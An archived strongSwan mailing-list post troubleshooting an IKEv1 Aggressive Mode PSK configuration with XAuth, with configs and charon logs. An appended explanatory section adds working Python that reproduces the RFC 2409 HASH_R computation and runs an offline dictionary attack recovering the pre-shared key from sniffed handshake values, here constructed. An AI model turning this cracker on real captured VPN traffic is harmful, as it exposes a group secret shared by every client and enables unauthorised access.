[strongSwan] IKEv1 PSK with group name?

Tony Zhou tonytzhou at gmail.com
Sat May 4 18:27:40 CEST 2013


Hi Martin,

Here's some slightly more detailed logs:

ipsec.conf:
conn IPSec-IKEv1
         keyexchange=ikev1
         aggressive=yes
         auto=add
         left=server.ip.address
         leftsubnet=0.0.0.0/0
         right=%any
         rightsourceip=client.ip.address/24
         rightid=@groupid
         rightauth=psk
         rightauth2=xauth-eap

strongswan.conf:
charon {

	#...

         # enable aggressive mode psk
         i_dont_care_about_security_and_use_aggressive_mode_psk = yes

         # ...
}


Strongswan parsing configuration file:

May  5 01:15:28 area11 charon: 10[CFG] received stroke: add connection 'IPSec-IKEv1'
May  5 01:15:28 area11 charon: 10[CFG] conn IPSec-IKEv1
May  5 01:15:28 area11 charon: 10[CFG]   left=server.ip.address
May  5 01:15:28 area11 charon: 10[CFG]   leftsubnet=0.0.0.0/0
May  5 01:15:28 area11 charon: 10[CFG]   leftsourceip=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftdns=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftauth=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftauth2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftid=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftid2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftrsakey=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftcert=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftcert2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftca=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftca2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftgroups=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftgroups2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftupdown=(null)
May  5 01:15:28 area11 charon: 10[CFG]   right=%any
May  5 01:15:28 area11 charon: 10[CFG]   rightsubnet=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightsourceip=client.ip.address/24
May  5 01:15:28 area11 charon: 10[CFG]   rightdns=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightauth=psk
May  5 01:15:28 area11 charon: 10[CFG]   rightauth2=xauth-eap
May  5 01:15:28 area11 charon: 10[CFG]   rightid=@groupid
May  5 01:15:28 area11 charon: 10[CFG]   rightid2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightrsakey=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightcert=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightcert2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightca=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightca2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightgroups=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightgroups2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightupdown=(null)
May  5 01:15:28 area11 charon: 10[CFG]   eap_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG]   aaa_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG]   xauth_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG]   ike=aes128-sha1-modp2048,3des-sha1-modp1536
May  5 01:15:28 area11 charon: 10[CFG]   esp=aes128-sha1,3des-sha1
May  5 01:15:28 area11 charon: 10[CFG]   dpddelay=30
May  5 01:15:28 area11 charon: 10[CFG]   dpdtimeout=150
May  5 01:15:28 area11 charon: 10[CFG]   dpdaction=0
May  5 01:15:28 area11 charon: 10[CFG]   closeaction=0
May  5 01:15:28 area11 charon: 10[CFG]   mediation=no
May  5 01:15:28 area11 charon: 10[CFG]   mediated_by=(null)
May  5 01:15:28 area11 charon: 10[CFG]   me_peerid=(null)
May  5 01:15:28 area11 charon: 10[CFG]   keyexchange=ikev1
May  5 01:15:28 area11 charon: 10[CFG] adding virtual IP address pool client.ip.address/24
May  5 01:15:28 area11 charon: 10[CFG] added configuration 'IPSec-IKEv1'

Note that it didn't mention that aggressive=yes is parsed.

Client connection log:
May  5 01:15:36 area11 charon: 02[ENC] parsed AGGRESSIVE request 0 [ SA KE No ID V V V V V V V V V ]
May  5 01:15:36 area11 charon: 02[CFG] looking for an ike config for server.ip.address...road.warrior.ip.address
May  5 01:15:36 area11 charon: 02[CFG]   candidate: server.ip.address...%any, prio 13
May  5 01:15:36 area11 charon: 02[CFG] found matching ike config: server.ip.address...%any with prio 13
May  5 01:15:36 area11 charon: 02[IKE] received XAuth vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received Cisco Unity vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received NAT-T (RFC 3947) vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received draft-ietf-ipsec-nat-t-ike-03 vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received draft-ietf-ipsec-nat-t-ike-02 vendor ID
May  5 01:15:36 area11 charon: 02[ENC] received unknown vendor ID: 16:f6:ca:16:e4:a4:06:6d:83:82:1a:0f:0a:ea:a8:62
May  5 01:15:36 area11 charon: 02[IKE] received draft-ietf-ipsec-nat-t-ike-00 vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received DPD vendor ID
May  5 01:15:36 area11 charon: 02[IKE] road.warrior.ip.address is initiating a Aggressive Mode IKE_SA
May  5 01:15:36 area11 charon: 02[IKE] IKE_SA (unnamed)[1] state change: CREATED => CONNECTING
...
May  5 01:15:36 area11 charon: 02[CFG] selected proposal: IKE:AES_CBC_256/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
May  5 01:15:36 area11 charon: 02[CFG] looking for XAuthInitPSK peer configs matching server.ip.address...road.warrior.ip.address[groupid]
May  5 01:15:36 area11 charon: 02[IKE] no peer config found
May  5 01:15:36 area11 charon: 02[IKE] queueing INFORMATIONAL task
May  5 01:15:36 area11 charon: 02[IKE] activating new tasks
May  5 01:15:36 area11 charon: 02[IKE]   activating INFORMATIONAL task
May  5 01:15:36 area11 charon: 02[ENC] generating INFORMATIONAL_V1 request 3392550384 [ N(AUTH_FAILED) ]
May  5 01:15:36 area11 charon: 02[NET] sending packet: from server.ip.address[500] to road.warrior.ip.address[48330] (56 bytes)
May  5 01:15:36 area11 charon: 02[IKE] IKE_SA (unnamed)[1] state change: CONNECTING => DESTROYING

Could it be possible that since Strongswan didn't parse the 
aggressive=yes term in the config, when it meets clients using 
aggressive mode, Strongswan cannot find a matching configuration?

Thanks,
TZ

On 5/3/2013 11:40 AM, Martin Willi wrote:
> Hi,
>
>> 12[IKE] client.ip.address is initiating a Aggressive Mode IKE_SA
>> 12[CFG] looking for XAuthInitPSK peer configs matching server.ip.address...client.ip.address[group]
>> 12[IKE] no peer config found
>
> I don't see the "aggressive" keyword in your ipsec.conf. Have you set
> it? man ipsec.conf for details.
>
> Also, to support Aggressive Mode PSK as responder, you'll have to
> confirm you are aware of the security implications and enable "weakSwan"
> mode using
>      charon.i_dont_care_about_security_and_use_aggressive_mode_psk
> in strongswan.conf, see that manpage for details.
>
> Regards
> Martin
>
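Why strongSwan makes the responder opt in with that deliberately ugly option name, as an added example that is not part of this thread and not strongSwan's code: in IKEv1 Aggressive Mode (RFC 2409, section 5.4) the responder's HASH_R is sent unencrypted in message 2, and with pre-shared-key authentication every other input to it (both nonces, both DH public values, both cookies, the initiator's SA payload and the responder's ID) is also on the wire. A passive capture is therefore enough for an offline dictionary attack on the PSK. The Python below reproduces the RFC 2409 HMAC-SHA1 computation and runs such an attack; all "captured" values are constructed for the example, and the PSK, word list and field sizes are assumptions.

```python
"""Offline dictionary attack on the PSK of an IKEv1 Aggressive Mode
exchange (RFC 2409 sections 5 and 5.4), using only what a passive
observer sees in messages 1 and 2. Every 'captured' value below is
CONSTRUCTED for this example; nothing comes from the thread above."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Fields that travel in the clear in Aggressive Mode messages 1 and 2."""
    ni_b: bytes      # initiator nonce payload body
    nr_b: bytes      # responder nonce payload body
    gxi: bytes       # initiator Diffie-Hellman public value (KE payload)
    gxr: bytes       # responder Diffie-Hellman public value
    cky_i: bytes     # initiator cookie from the ISAKMP header
    cky_r: bytes     # responder cookie
    sai_b: bytes     # body of the initiator's SA payload
    idir_b: bytes    # body of the responder's ID payload
    hash_r: bytes    # HASH_R, sent unencrypted in message 2


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication: prf(PSK, Ni_b | Nr_b),
    with prf = HMAC-SHA1 as negotiated in the log above."""
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def compute_hash_r(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, cap.ni_b, cap.nr_b)
    msg = cap.gxr + cap.gxi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def crack_psk(cap: AggressiveModeCapture,
              candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate PSK that reproduces the captured HASH_R."""
    for candidate in candidates:
        if hmac.compare_digest(compute_hash_r(candidate, cap), cap.hash_r):
            return candidate
    return None


def _constructed(label: bytes, length: int) -> bytes:
    """Deterministic stand-in for a captured field (constructed, not real)."""
    return hashlib.shake_256(label).digest(length)


def build_capture(psk: bytes) -> AggressiveModeCapture:
    """Play the gateway: constructed wire values plus the HASH_R a
    responder holding `psk` would send in the clear in message 2."""
    fields = dict(
        ni_b=_constructed(b"Ni", 32),
        nr_b=_constructed(b"Nr", 32),
        gxi=_constructed(b"g^xi", 128),     # MODP_1024 public value
        gxr=_constructed(b"g^xr", 128),
        cky_i=_constructed(b"CKY-I", 8),
        cky_r=_constructed(b"CKY-R", 8),
        sai_b=_constructed(b"SAi_b", 64),
        # ID payload body: ID_IPV4_ADDR (1), UDP (17), port 500, 192.0.2.1
        idir_b=bytes([1, 17]) + (500).to_bytes(2, "big") + bytes([192, 0, 2, 1]),
    )
    partial = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=compute_hash_r(psk, partial), **fields)


if __name__ == "__main__":
    capture = build_capture(b"groupsecret")      # assumed gateway PSK
    wordlist = [b"password", b"cisco123", b"groupsecret", b"letmein"]
    print("recovered PSK:", crack_psk(capture, wordlist))
```

In Main Mode the same HASH_I and HASH_R are only ever sent inside the encrypted messages 5 and 6, which is why strongSwan requires the opt-in for Aggressive Mode PSK as responder and not for Main Mode PSK. With an XAuth group setup the PSK is shared by every client in the group, so recovering it once affects all of them.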
